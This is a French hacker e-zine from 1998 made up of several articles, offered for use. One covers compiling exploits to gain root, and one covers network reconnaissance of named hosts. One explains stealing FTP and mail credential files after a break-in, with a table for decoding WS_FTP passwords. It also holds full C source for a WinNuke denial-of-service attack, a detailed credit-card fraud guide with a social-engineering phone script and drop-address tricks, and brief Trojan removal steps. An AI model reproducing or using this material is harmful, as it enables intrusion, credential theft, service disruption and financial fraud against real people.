C", vous avez besoin d'un compte sur le systeme que vous voulez hacker pour utiliser un
exploit. Vous avez besoin de mettre votre exloit dans votre repertoire sur le serveur. . (utilisez un compte hacker et non
le votre!) Pour mettre l'exploit sur votre compte vous pouvez utiliser le port 21 (FTP), et mettre l'exploit dans votre reperoire,
ou alors Telnet. Une fois que l'exploit est dans votre repertoire vous devez le compiler. La commande devrait etre:
blah:~/$gcc exploit.c

Ca devrait compiler votre exploit. N'oubliez pas que certains exploits contiennent des bogues et qu'il serait preferable pour
vous de connaitre votre "
C". Apres avoir compiler l'exploit, vous serez capable de l'executer et si vous avez bien travaillez
le "
root" vous aurez. Mais, tous ces exploits ne sont pas les meme et ils necessitent des commandes differentes pour
marcher.

4) Ou pouvez vous trouver des exploits ?
Le meilleur site:
http://www.rootshell.com

5)Conclusion
Et bien, ce texte devrait expliquer tout ce que vous devriez connaitre sur les exploits. Si vous pensez qu'il manque quelque
chose: pr0tek@hotmail.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= L'art de trouver des serveurs de les mapers. (theorie)=-
(par Binf_)
Chui bien fiere de collaborer a ce premier numero de FrHACK ,et
je lui souhaite longue vie.

Bon hum par ou commencer. La technique
que je vais vous montrer ou vous expliquer en pronfondeur tout
dependant de ui vous etes est simple.Et je crois que ce la base pour
Tout les Hackers ou tout ceux qui veulent s'aseillier. En passant
ya personne qui est nee elite..Du moins je pense. Dans mon cas
j'ai commencer dans les temps des bbs :) hehehe c'etais kool..
des fois je voyais des choses sur les /passwd pis des crack ..
mais moi jme trouvais elite avec mon 14.4 pis mes warez heheeh
les temps ont bien changer :) J'ai commencer a hacker un peux avec
l'exploit phf un clasique du hack...commancer a l'apprendre parcoeur
mais l'utiliserpas sur un serveur a mon que vous aimer ca etre
logger pis avoir le msg phf_cgi.abuse.html :).

Mais les temps ont passer..et j'ai modifier ma facons de penser
et de hacker..je hackais avec windows 3.1..hum j'etais vraiment
out of date.. j'ai commencer a me tenir dans des channels comme
#hack ,#hackerz ect... pis j'ai demander des questions lame
je passsais pour un lamer :) .Puis chui tomber sur des bonnes
personnes qui m'ont aider..faut dire qu'en meme temps que
je commencais a hacker j'ecrivais des virus en assembleur
mais bon ce du passer.. alors on m'a suggerer d'installer linux
je hackais pis je conessais meme pas linux..peux apres
j'ai installer linux puis jme suis acharner 4 mois a le mettre up.

**(en passant ce pas parceque ta linux que te bon mais ca aide a
comprendre)**

Puis jme documentais...ce sur je catchais rien mais a force de lire
400 fois le meme termes je catchais..Une chance que je parlais
anglais. Bon breff linux up je commence a me hacker moi meme.
Avec du temps j'ai compris..alors j'ai mi ma box up sur internet
j'ai commencer a utiliser les nouvelles commandes qui etais a ma
dispositions et a les exploiters.

Mais il y avais qqch qui me manquais..pour trouver des serveurs..
comment faire..! Il y as le web..ou la luck..ou les freeshell ou
<<LES SERVEURS MAPS>> les maps de serveurs :) utile...
enfais je ne sais pas si on peux faire ce que je vais vous montere
avec Windows , mais vous pouver vous aseillier..enfait je pense que
Winsock offre quelques commande dont je vais vous parler.

Pour mapper un serveur(domaine) ce qu'il faut :

-Linux (ou un system qui suporte les commandes
dig,nslookup et traceroute
winsock 2.0d spupporte dig.mais pour les autres
commandes..??)
-Patience
-Courage
-Petite connaissance du protocol ip / Networking / routers
-Pis du temps (ce bon l'etee commence)

Commandes requises utilitee man page

nslookup pour trouver si le serveur
qu'on veux travcer possede
un Nameserveur(utile pour le
spoof si on penetre le nameserveur OUI
ect...) Enfait c'est pour voir
quellee qualitee peut avoire notre
cible.Peut aussi etre utiliser pour
des chose plus ressente comme
la version de bind.



traceroute pour trouver d'ou provien un packet
groupe de packet ou un hosts puis OUI
le chemin qu'il entrprand entre
les hosts.




dig Pour tracer les nameservers ratcher a un
reseau ressemble a nslookup mais utilise OUI
un datagram different..



Bon cela semble un peux plus simple... et pour vous
l'expliquer j'ai fais une mini m ap d'un serveur bien
connu ViDEOTRON a MONTREAL malereusement ce n'est pas
vraiment un bon network pour utiliser ses commandes car
il n'utilise pas beaucoup d'authotentifications ..il se
relie plustot a 2 NS principaux : dns1.videotron.net
&
dns2.videotron.net


Mais les examples que j'ai ramaser sont asser pertinent
pour comprendre..alors nous alors nous faire une petite
mise en scene..:

3h am je sais pas koi faire..je surf puis je tombe sur une
page qui est vulgaire ,alors jveux la pirater (ce pas vrai
mais bon pour hacker il faut une motivation).
Alors la page c'est www.infinit.net alors je retourne dans
mon terminal linux puis je tape:

F0C:/ dig www.infinit.net

; <<>> DiG 8.1 <<>> www.infinit.net
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUERY SECTION:
;; www.infinit.net, type = A , class = IN

;; ANSWER SECTION:
www.infinit.net. 3H IN A 207.253.106.140 # ip de la page

;; AUTHORITY SECTION:
infiniT.net. 3H IN NS dns1.videotron.net. # NS de la page
infiniT.net. 3H IN NS dns2.videotron.net.

;; ADDITIONAL SECTION:
dns1.videotron.net. 1D IN A 205.151.222.250 # NS principaux de
dns2.videotron.net. 1D IN A 205.151.222.251 # videotron

;; Total query time: 181 msec
;; FROM: F0C to SERVER: default -- 205.151.222.250
;; WHEN: Thu Jun 18 18:56:24 1998
;; MSG SIZE sent: 33 rcvd: 140

Bon...cela nous donne rien d'interessant pour l'instant..alors aseillier un
autre commande

F0C:/ tracetoute www.infinit.net

1 ts95-mtl.videotron.net (207.96.131.5) 142.344 ms 139.712 ms 168.246 ms
2 207.253.114.1 (207.253.114.1) 128.092 ms 268.464 ms 287.039 ms
3 100mbit-fe-3-1.rb01-piex.videotron.net (207.253.253.29) 208.127 ms 127.183 ms 128.085 ms
4 * vitali.videotron.net (207.253.106.129) 140.34 ms *

Bon..ici nous avons eu un reponse.peu longue..mais qui peux nous
aider ici on peux voire..que l'adresse rest hoster par
vitali.videotron.net car c'est la dernierre addresse qui repond
au traceroute.. premiere info pour le hacker il sais ou aller
chercher sa page a hacker mais ce n'est pas ca que je veux faire.
dumoin vous insiter a faire ..ce l'explication qui doit compter...
les autres addresse sont des routers ce qui redirecter les connections
tcp icmp udp au bon serveur avec le bon query.
(Il est possible d'hacker des routers mais cela sera peut
etre un topic dans un article futur.)

ici la commande nslookup nous aidera pas.. car nous avons deja
identifier les NS avec la commande dig..mais si les gens preferent
nslookup c'est qu'il peux nous dire quels sont les nameservers
importants et quels ne le sont pas..alors nous savons sur
kel domaine consentrer nos efforts.

exemple..si on fais un nslookup sur : www.yahoo.com
F0C:/ nslookup -type=any www.yahoo.com

Server: dns1.videotron.net # NS de mon PROViDER..
Address: 205.151.222.250 # Qui est utiliser pour faire un query
# sur l'addresse demander.
Server: dns1.videotron.net # Page demander
Address: 205.151.222.250 # Son ip

Non-authoritative answer: # Ns qui n'as pas d'interet mais qui repond
# pour la page.
www.yahoo.com canonical name = www9.yahoo.com

Authoritative answers can be found from:
# iCi on as une liste des Nameservers authoriser qui
# pourrais nous etre tres utiles pour ensuite faire un
# dig , traceroute sur chaque serveur.

yahoo.com nameserver = ns.yahoo.com
yahoo.com nameserver = ns1.yahoo.com
yahoo.com nameserver = av1.yahoo.com
yahoo.com nameserver = ns2.dca.yahoo.com
yahoo.com nameserver = ns.europe.yahoo.com
yahoo.com nameserver = ns.yahoo.ca
ns.yahoo.com internet address = 204.71.177.33
ns1.yahoo.com internet address = 204.71.200.33
av1.yahoo.com internet address = 204.123.2.85
ns2.dca.yahoo.com internet address = 209.143.200.34
ns.europe.yahoo.com internet address = 195.67.49.25
ns.yahoo.ca internet address = 206.222.66.41

Bien sur ici on as vu somairement l'utilitee des des commandes mais
plutot comment les exploiter . ensuite c'est la que le hacking
entre en jeux.. moi meme je trouve ca endormant mais c'est
avec des commandes si normales comme celle ci qu'on peux ensuite
les utilisent pour toutes sortes de fins. Exemple maper un server

Comment faire..simple(relatif)..on doit avoir une target
comme un nameserveur puis le tracerouter..ensuite sauver
les infos dans un file.. puis ensuite scanner les cibles pour
des ports ouverts...sinon on continu notre scan des autre cibles
j'usqu'a ce que nous trouvions le serveur avec la securitee la
plus faible..Et on hack...puis si le serveur se trouve dans le meme
reseau que les autres des fois on peux avoir des surprises..car
souvent les networks on des hosts.deny qui interdisent au autres
de rentrer dans le serveur... mais quand l'utilisateur vien du meme
net block il l'accecpte..bon...hehe cela s'appelle du ip trusting..
puis plus on infiltre un reseau et plus on possede le controle
et plus on peux avoir d'information.

Bien sur je ne vous donnerai pas d'exemple sur cela car je ne veux
pas reveler mes target mais jpeux vous dire que videotron est
pas un bin bonne target ni yahoo..dumoin si vous vous aseillier
chui pas responsable..mes example etais du pur hazard (i-).

En conclusion mon texte peux sembler redondant(repetitif) mais
dite vous que c'est avec de la repetition que l'on fini par
apprendre..

(A SUiVRE)


iNDEX:
Pour sauver une session de dig,nslookup ou traceroute vous pouver faire
====>(ceci est un login prompt pour ceux qui avais pas catcher) F0C:/
F0C:/traceroute host.com >> file.name

Si vous vouler remplacer un fichier utiliser unseul > a la place de deux..
deux copie le resultat a la fin si il y as deja qqch.


MERCi..
Sites a voir
www.rhino9.com (Rhino9 sekurity team)
www.frhack.org (DuH)
www.yahoo.com [:)]
Pour me parler (iRC UNDERNET) NiCK:BiNF_
#hack.fr,#rhino9,#phreak.fr
e-mail: binf_80@hotmail.com

[BiNFUCKER/DW/F0C] !998 PRODUKTiON


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-= La base de registre: Comment ca marche =-
(Par Utopiste)



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-= Ke faire kand on a reussi à entrer dans un ordi ? =-
(par Majestix)

C'est la l'un des points les plus délicats existant dans la hacking,
On peut:
- partir (peu recommandé)
- tout effacer (peu recommander aussi à part sur la machine d'un pédophile)
- prendre les fichiers interressants

  
(c'est le mieux !!)

Il serait un peu bête de partir après avoir reussi un piratage, ben vous vous
êtes donné du mal pour entrer et après vous partez ???

Tout effacer aussi est rigoureusement idiot! Totu d'abord bonjour l'image qu'on
donne des hackers! ensuite le gars ne vous a rien fait, non, c'est pas un truk à
faire!


I. Ke faut-il recupérer ??

La chose la plus intelligents a faire est de recuperer les fichier *.ini ki
sont presents sur la machine, comme :

-ws_ftp.ini
-eudora.ini

ou encore:

-tree.bak
-lmhosts
- a vous de voir ce ki est interressant !!


II. Mais pourkoi les recupérer ?

Ces fichiers la sont tres utiles car ils vous ddonnent acces à ce à koi la
machine ke vous avez piraté a acces, comme d'autres machines, des ftp etc.

III. Ke faire apres cela?

Utiliser ces fichiers, komman ? les .ini de ftp sont utilisable par le même
prog de FTP ( par ex: WS-ftp.ini pour WSFTP etc.)
Si vous voulez utiliser ces acces ailleurs, il faudra decouvrir le mot de passe
ki est le plus souvent crypté. Komman faire?
eh bien:

1) utiliser Revelation de Snadboy ki permet de decouvrir ce k'il y a
derriere les etoiles, vous lancez le prog de FTP et vous diriger le curseur sur
les étoiles

2) vous les decrypter tout seul, la encore: komman faire ? editez le
fichier .ini et regardez les PWD, ce sont les mots de passes ki sont cryptés.
voici komman wsftp(saufle pro) crypte ses donnés :

A=61 B=63 C=65 D=67 E=69 F=6B G=6D H=6F I=71 J=73 K=75 L=77 M=79 N=7B O=7D P=7F
Q=81 R=83 S=85 T=87 U=89 V=8B W=8D X=8F Y=91 Z=93

komman g fais ?

j'ai creer un nouveau log, dont le mot de passe est: ABCDEFGHIJKLM etc.
et j'ai décodé rien de plus simple!!! faites en de même pour les autres prog!

Le fichers lmhosts est un fichier ki est utilisé lors du piratage de certains
systemes, regardez l'ip a l'interieur et cela vous donne l'ip d'une machine
piratable, c pas kool ca ? ;)

Et voila bon hacking !!
by -=[MAJESTIX]=- '98


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-= Nuke =-
(par Utopiste)

Bon tout le monde savent ce qu'est le nuke, mais comme quand meme pour bien du monde ce n'est
que inscrire un ip dans une boite et peser sur un bouton " nuke him " J'ai décider de vous
dévoilé le fonctionnement d'un logiciel de nuke.

#include <stdio.h>
#include <string.h>
#include <winsock.h> /* Implémente les fonctions TCP/IP */

#define PortDeNuke 139 /* le port d'attaque */

int x, s;
char *str = "FrHack"; /* n'importe quel chaine à le même effet */
struct sockaddr_in addr;
struct hostent *host;

int open_sock(int sock, char *server, short port)
{
struct sockaddr_in blah;
struct hostent *he;
memset((char *)&blah,'0', sizeof(blah));

blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);

if ((he = gethostbyname(server)) != NULL)
{
memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length );
}
else
{
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0)
{
/* Le dns est po correct, soit invalide soit le gars spoof */
printf("Impossible de transformer le nom de domaine en adresse IP");
return(-1);
}
}

/* Se connecter à l'ordinateur que nous désirons nuker */
if (connect(sock,(struct sockaddr *)&blah,16)==-1)
{
/* Impossible de se connecter à l'ordinateur, fermer le socket */
printf("Impossible de se connecter à l'ordinateur");
closesocket(sock);
return(-1);
}
/* Si il a aucune erreur alors nous somme connecter à l'ordinateur */
printf("Connecter à [%s:%d].\n",server,port);
return 0;
}

void main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested = MAKEWORD(1, 1); /* info pour l'initalisatoin de winsock */
/* Vérifier si le paramètre ip est là */
if (argc != 2)
{
printf("Utilisation: : %s <ip de la victime>\n",argv[0]);
exit(0);
}
/* Initialisation de la dll Winsock */
wVersionRequested = MAKEWORD(1, 1);
if ( (int err = WSAStartup(wVersionRequested, &wsaData)) != 0 )
{
/* Une erreur est survenu lors de l'initialisation de la dll winsock */
printf("Impossible d'initialiser le Winsock");
exit(0);
}
/* Création d'une instance de socket */
if ( (s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
{
printf("%d ", WSAGetLastError());
perror("socket()");
exit(-1);
}

open_sock(s,argv[1],PortDeNuke);

printf("Envois du message... ");
/* Envoyer le packetm, c'est en réalité cet ligne qui fait tout planter */
send(s,str,strlen(str),MSG_OOB);
printf("La personne est théoriquement nuker\n");
/* Fermer le socket */
closesocket(s);
}

Je tiens à remercier _eci et _wfx pour leurs précédent code source concernant le nuke. Ce
programme devrait marcher contre les os win95 et winNT 4.0,

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Le fantasmique monde du ___ _____ ____ ____ __ _ _ ___
/__/ /___ / / / ) / _ / / / / \ // /__/
//_ //_ // / /__/ / /// / / / /\\ // // __
/__/ /_//_/ /_/ \\ /___/ /_/ /_/ \\/ //_// (ecrit par vaToO)


DISCLAIMER: toutes les informations contenues dans le texte suivant ne sont pas a appliquer.
Elles ne vous sont soumises qu a unique but éducatif. Enfin ca,tout le monde le sait deja...

Introduction
~~~~~~~~~~~~
Je suis a bout. J' peux plus supporter cette situation. Je me souviens de la derniere
thune ke j' ai depense. Le souvenir est vague, ca remonte a longtemps; c'etait pour un
graveur de cederom, je crois( hehe fo bien respecter la law, de temps en temps...).
Depuis, j' ai pas vu la couleur d' un petit billet vert ... euh... y parait k' ils sont
rouges maintenant , depuis bien longtemps..Enfin bref, la situation est insupportable.
Seul moyen d' y remedier: le CaRdInG!Les newbies me diront ~c' est koi ca le cardingue??
hehe...Sacres newbies.. Le cardingue, c' est l' ~art~ de se sortir de la merde dans
laquelle je suis. Ca va me permettre de depenser la thune ke j' ai pas, de
m' acheter le dernier HD de 20Go a la mode pour mon PC1512 SD...Enfin bref,d'etre heureux!

Sommaire
~~~~~~~~
On peut considerer cet article comme une espece de tutorial du CaRdInG,car il traite
d' un peu tous les themes ki rodent autour. Ces themes sont:

[~1~) La securite des numeros]
[a) Un nombre immense de possibilites]
[b) L' algorythme]
[c) La bande magnetique]
[~2~) La recherche d' un numero valide]
[a) Les numeros "virtuels"]
[b) Les numeros de comptes existants]
[~3~) Les commandes] <<ce ki nous interesse le plus!
[a) Commande par Internet]
[b) Commande a des services par telephone]
[~4~) Le social engineering pour les commandes par telephone]
[~5~) Le point de reception de la commande]



Article
~~~~~~~
____________________________
(~1~] La securite des numeros)
°==========================°
____________________________________
(a] Un nombre immense de possibilites)
°==================================°


Une carte de securite sociale a 9 chiffres. Un numero de telephone a 10 chiffres,
incluant l' indicatif. Et un numero complet de MasterCard a 20 chiffres.Pourkoi
autant? Ce n' est pas mathematiquement necessaire pour un numero de carte de credit
d' avoir plus de 8 chiffres.Chaque possesseur de carte ne doit avoir qu' un
seul numero;
les Visa et les MasterCard sont estimees a avoir environ 65 millions d'utilisateurs,
leur systeme de numeros doit donc avoir au minimum 65 millions de numeros possibles.
Il y a 1000 millions de combinaisons possibles de 8 chiffres --00000000, 00000001, 00000002,
jusqu' a 99999999. On pourrait donc dire que 8 chiffres seraient assez.
En fait, une carte Visa a 13 chiffres,et quelques fois plus.Une carte American Express a 15
chiffres. Les producteurs de carte doivent surement prevoir des billions et des billions
de nouveaux utilisateurs dans le futur! Les chiffres en supplement ne sont en
fait rien d'autre qu' une securite. Disons que votre numero de Visa soit 4211 503 417
268. Chaque nouvel achat doit etre entre dans un ordinateur a partir du point de vente.
Le numero permet d' ajouter l' achat a votre compte ( juske la je pense ke vous suivez! ).
Les personnes qui entrent les numeros de compte dans les ordinateurs font parfois des
erreurs. Ils peuvent entrer 4211 503 471 268 ou 4211 703 417 268 a la
place.L'avantage de ce systeme a 13 chiffres, c' est qu' il y a peu de chance pour
ke ces deux faux numeros existent vraiment.Il y a 10 trillions de numeros de Visa a 13 chiffres
possibles (0000 000 000 000,...). Seulement environ 65 millions d' entre eux sont
des numeros utilises.La probabilite pour qu' un numero entre incorrectement corresponde avec
un vrai numero est d' environ 1 sur 150 000. D' autres systemes de numerotation de cartes
sont encore plus securises. Sur le quadrillion de possibilites pour un numero
d' American Express a 15 chiffres, seulement 11 millions sont assignes. La chance d'avoir un
numero correspondant a un compte existant est ici de 1 sur 90 000 000. Pour la MasterCard,
ki a 20 chiffres, il y a 100 000 000 000 000 000 000 combinaisons! La probabilite est ici
de 1 sur 1,5 trillions! Cela cree alors de nombreuses ressources d' arnaques!
Des pubs, des TV achat (:() permettent aux gens d' acheter leurs produits en ne leur
fournissant que le numero de votre carte par telephone.. Comment peuvent-ils etre
sur que ceux qui appellent ont une reelle carte de credit? Ils basent leur confiance
sur la securite du systeme de numerotation de la carte. Si quelqu' un appelle et donne
un numero de carte, celui-ci ne sera surement pas un number existant! L' arnaque peut
etre devoilee instantannement en se connectant a l'ordinateur de la compagnie de la carte.

________________
(b] L' algorythme)
°==============°

Les numeros de carte de credit sont generes a partir du numero de compte, du prefixe de
la banque, de chiffres et lettres automatiquement attribuees a toutes les cartes,et d'un
chiffre genere par algorythme en fonction de tous les chiffres precedants. Mais expliker
comment cela marche serait trop long, surtout ke cela depend du type de carte
(Eurocard, Mastercard, Visa,...). Le mieux, pour verifier un numero de carte, ou d' en
generer un virtuel, mais ki est tout de meme valide grace a l' algorythme, est
d'utiliser un programme ki s' en charge seul, tel que Credit Master ou bien Credit Wizard.
______________________
(c] La bande magnetique)
°====================°

L' une des securites les plus importantes est bien entendu la bande magnetique. Vous
devez penser k' il y a un grand nombre d' infos concernant le titulaire de la carte dans cette
bande. Detrompez-vous! Il ne peut y avoir plus d' infos qu' une bande magnetique ordinaire
de cassette audio. La bande ne contient que les infos comme le numero de compte, et les
infos sur l' identite du titulaire. Evidemment, la date d' expiration de la carte est dans
la bande magnetique. Les cartes expirees peuvent ainsi etre "mangees" par le distributeur. La
limite de credit, l' adresse, le numero de tel, l'emploi,etc, ne sont pas indiques dans la
bande magnetique. En outre, le numero d'identification a entrer est inscrit dans cette bande
(les 4 chiffres a taper au distributeur). De nombreux distributeurs ont une limite secrete
de 3 essais pour entrer le bon code. Apres 3 essais invalides, la carte est avalee, consideree
comme volee.
_____________________________________
(~2~] La recherche d' un numero valide)
°===================================°
_________________________
(a] Les numeros "virtuels")
°=======================°

Les numeros ke j' appelle virtuels sont les numeros ki ressortent des generateurs de
numba de cartes de credit.. Ces numeros ne correspondent a AUCUN compte valide,mais sont
valides vis-a-vis de certaines compagnies, peu soucieuses au niveau securite.
Celles-ci ne verifient en fait ke l' algorythme du numero k' on leur a fourni, au lieu
de verifier aupres de la banque elle-meme. Et croyez-moi, des compagnies comme celles-ci
existent encore! Et meme sur Internet... Et meme des fournisseurs d' acces a Internet..
hehe..Ptet ke vous le saviez deja, mais Compuserve n' a aucun systeme de verification
des comptes aupres des banques lors de l' inscription. Tout le monde peut s' inscrire
avec un fo number. Il suffit d' avoir un generateur de number comme Credit Master ou
Credit Wizard (les 2 meilleurs a mon avis), et de recreer un compte tous les 15 jours
pour pas ke cela devienne trop dangereux...C' est egalement possible avec d' autres
fournisseurs comme Club-Internet. C' etait possible avec AOL jusk' a janvier 1997, mais
il fo croire k 'ils ont reussi a avoir assez de thune en France pour s'installer un
meilleur systeme de scurite. Ou alors, ils l' ont fais parce ke tout le monde piratait,
vu leurs prix ;)fUcK AoL.

___________________________________
(b] Les numeros de comptes existants)
°=================================°

Evidemment, l' interet du CaRdInG est de ne pas utiliser son propre compte... Il faut
donc reussir a trouver le numero d' un pauvre petit smurf..mmmhh.. Comment faire? Kelles
infos faut-il avoir? Tout depend de ce ke vous voulez faire. Le mieux est d' avoir
*toutes* les infos au sujet du pigeon: number de carte, date d' expiration,
Nom,adresse,number de tel, et si possible date de mise en service. Bon, vous allez me dire,
je suis un peu exigeant. Vous voulez faire du bon boulot, oui ou non? Ben, essayez de
chopper au moins le number de carte, la date d' expiration, et le nom du Keum. Pour ce
faire (je sais, je parle bien ), vous pouvez user de plusieurs methodes. La
premiere est de se servir de kelk' un de votre entourage ki ne connait rien de vos
activites frauduleuses (je vous fais confiance, je sais ke vous n' avez jamais rien
raconte de ce ke vous faites pendant vos heures de loisir), et ki ne sait meme pas
ke vous faites de l' informatique.Exemple, vous etes chez kelk' un ke vous connaissez
a peine, vous squatez chez lui, vous reperez ou il amis son portefeuille, et vous l' ouvrez
des k'il a le dos tourne, et ke vous etes sur k' il ne peut pas vous surprendre. Vous
regardez sa carte d' identite, et sa carte de credit. Resultat, vous avez son number
de carte, la date
d' expiration de sa carte; son nom ( si vous ne l' aviez pas deja), son adresse, son
number de tel.!! Un conseil: ne faites pas ca a des gens ke vous frequenterez par la
suite, par securite, ou a des keums ke vous pouvez pas sentir, style des mecs du FN, ou
le keum k' a fais cocu ta soeur, mais ki est pas au courant ke t' es son frere, et comme
ca vous aurez moins de remords a claker 5000 balles sur son dos... Bon, sinon, je vous fais
confiance, il y a un nombre illimite de moyens de chopper un number et les infos ki vont
autour..Il suffit de faire tres attention.

__________________________________________________
(~3~] Les commandes <<ce ki nous interesse le plus!)
°================================================°
________________________
(a] Commande par Internet)
°======================°

Les commandes par Internet se font de plus en plus difficilement avec des
faux number de cartes. Si vous utilise un numero de generateur, c-a-d un numero ne
correspondant a aucun compte, bon courage! La norme https (secure) est de plus en plus
repandue sur le reseau, et incontournable, car elle permet au serveur de verifier l'
authenticite du compte aupres de la banque. N' essayez pas des numeros au hasard, vous n'
y arriverez JAMAIS.(voir 1.a).
Le mieux est d'utiliser un numero correspondant a un vrai compte.Le
paragraphe precedent vous indiquait comment en trouver. Considerons ke vous en ayez trouve un.
En general,les formulaires de reglement des serveurs par le web vous demande:

1) Votre Nom
2) Votre adresse
3) Votre Numero de Tel
4) Votre Numero de Carte
5) Votre Banque
6) La date d' expiration
7) Votre E-mail

Ce ki est important, c' est le nom, le numero de carte, la banque, et
la date d'expiration. Ces informations sont absolument necessaire pour k' ils verifien
t si vous etes solvable. Pour le numero de Tel, donnez-en un ki sonne toujours
occupe, ou mieux, celui d' une cabine ki soit juste a cote de chez vous.. Pour l' email,
donnez-en une specialement cree pour ce CaRdInG, a altern par exemple
(http://www.altern.org). Pour l'adresse, nous verrons ca dans le paragraphe 5.
Commandez des objets a gros prix, ils arriveront plus vite, et seront
livres plus assurement.


________________________________________
(b] Commande a des services par telephone)
°======================================°

Le systeme est un peu le meme par le telephone, mis a part l' assurance dont
vous devez faire preuve. Reperez un numero de vente par telephone(style TV Achat)ki vous
interesse, notez les references du produit ki vous interesse, et reunissez toutes les
infos du mec a ki vous avez pique le numero de carte sur une meme feuille de papier.
Le secret de cette combine est d' etre organise, sur de soi, et d' avoir des reponses
precises, sans hesitation. Telephonez au service a partir d' une cabine telephonique, et
donnez toutes les infos k' ils vout demandent. Toutes les infos principales sur le pigeon
doivent etre EXACTES. Donnez un faux numero de tel, ki sonne toujours dans le vide,
et une fosse adresse (voir 5). Demandez kan vous recevrez le paquet.

___________________________________________________________
(~4~] Le social engineering pour les commandes par telephone)
°=========================================================°

Je vous montre maintenant un petit dialogue entre un CaRdEr et un
operateur par phone pour vous donner une petite idee:
Operateur: "Krosoft Service Vente Maintenance De Merde, bonjour"
Carder: "Bonjour, je voudrais faire une commande,s'il vous plait.
Operateur: "Bien sur, que voudriez-vous commander?"
Carder: "10 disque durs 3.6 Go Decheztrouduc."
Operateur: "Tres bien, y a-t-il autre chose?"
Carder: "Non, ce sera tout."
Operateur: "Comment souhaitez-vous regler? Mastercard, Visa?"
Carder: "Visa."
Operateur: "Votre nom, s' il vous plait?"
Carder: "Jean PABO." (Nom sur la carte)
Operateur: "Quel est votre numero de VISA?"
Carder: "4240-419-001-340" (carte du pigeon)
Operateur: "La date d' expiration?"
Carder: "08/99."
Operateur: "Cela vous fera 8991 Francs."
Carder: "Tres bien."
Operateur: "A quelle adresse le colis doit-il etre livre?"
Carder: "6, rue Pasteur, 75 000-PARIS."(adresse->voir paragraphe 5.)
Operateur: "Quel est votre numero de telephone personnel?"
Carder: "01-00-11-22-33" (Numero toujours occupe)
Operateur: "Je vous demanderais votre numero de telephone de travail,
au cas ou nous aurions besoin de vous joindre dans la
journee."
Carder: "Vous pouvez me joindre toute la journee au meme numero."
Operateur: "Tres bien. Vous recevrez le colis sous quelques jours. Bonne
journee."
Carder: "Merci beaucoup.Au revoir." <<--La, vous pouvez le remercier
bien fort!

_________________________________________
(~5~] Le point de reception de la commande)
°=======================================°

faire preuve. Reperez un numero de vente par telephone(style TV Achat)ki vous
interesse, Voici l' etape la plus delicate a effectuer en ce ki concerne le CaRdInG.
C' est bien joli de pouvoir commander ce ke l' on veut, mais encore faut-il pouvoir
recuperer les colis. Pas kestion de les faire envoyer chez soi! Ce serait dommage de
voir arriver des petits hommes en bleu plutot k' un beau petit colis. Donc, pour
pouvoir recuperer le colis, il existe plusieurs solutions. -La premiere solution est de
trouver une maison en vente, ou une maison abandonnee depuis peu. Seul probleme: la plupart
de ces maisons ont les volets fermes...A moins ke vous ne vouliez penetrer a l' interieur,
il faut trouver une autre solution. Celle-ci serait de trouver une maison dont on
sait ke le proprietaire est absent toute la journee. Ainsi, vous pourrez laisser un mot sur
la porte des k' il sera parti, du style:
"Je travaille de 8h a 20h, veuillez deposer le colis sous le Porche,
je prends la responsabilite de ne pas signer le recu". Ou bien, un autre genre: "Je suis
absent de 8h a 20h, veuillez deposer le colis a telle adresse, les personnes que vous
trouverez sont au courant ( vous pouvez leur poser des kestions)", et la vous donnez
votre veritable adresse. L' astuce est ke la compagnie a laquelle vous avez commande le colis
ne connait pas votre veritable adresse, alors ke vous le recevez. Si vous vous servez
du premier mot, vous n' avez plus qu' a aller chercher le colis chez le pigeon.
-Une autre solution serait de donner l' adresse de gens ke vous ne
connaissez pas lors la commande, puis d' aller chercher le colis chez eux plus tard, en
invoquant une excuse bidon, par exemple ke vous etiez etonne de ne pas recevoir le
colis, ke vous avez telephonne a la compagnie pour avoir des nouvelles, et k' ils vous ont
indike l' adresse ou ils l' avaient envoye. La, soyez polis, surs de vous,
et n' oubliez pas de les remercier en partant!
-Une autre solution est la votre. Du moins, si vous en avez une! Mais je
suis sur ke vous etes capable d' en trouver des biens meilleures... En cherchant un
peu, on trouve toujours.

Conclusion
~~~~~~~~~~
N' en abusez pas trop, il faut k' il m' en reste un peu...
_______
\(EOF)/
___ ___ °°°°°
)(() )( )
( )() ( ))( le savoir mene a la
) ((_)) ( ) liberte
)_) ( (
(_( )(
)_) _ ) ___ ____ ___ ___
(__)( ) ( ) ( _ ) (____) ( ) ( )
(__) \(_)/ )(-)( )( )O( )O(
)__( )_( (_) (_) (__) (___) (___)
(____) [ vatoo75@altern.org ]
o(____)o
°o°o°o°(Mai 1998)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-








COMMENT ENLEVER LE "VIRUS" CHEVAL?





LA PREMIÈRE VERSION DU CHEVAL (port 5000):








Premièrement, appuyez sur CTRL + ALT + SUPPR





Fermez le programme nommez mschv32.exe


Quelques secondes un autre tableau apparait, recliquez


sur FIN DE TACHE.


Allez enlever le fichier mschv32.exe se trouvant dans


\WINDOWS\SYSTEM\





Maintenant, vous n'êtes plus infecté de ce cheval!





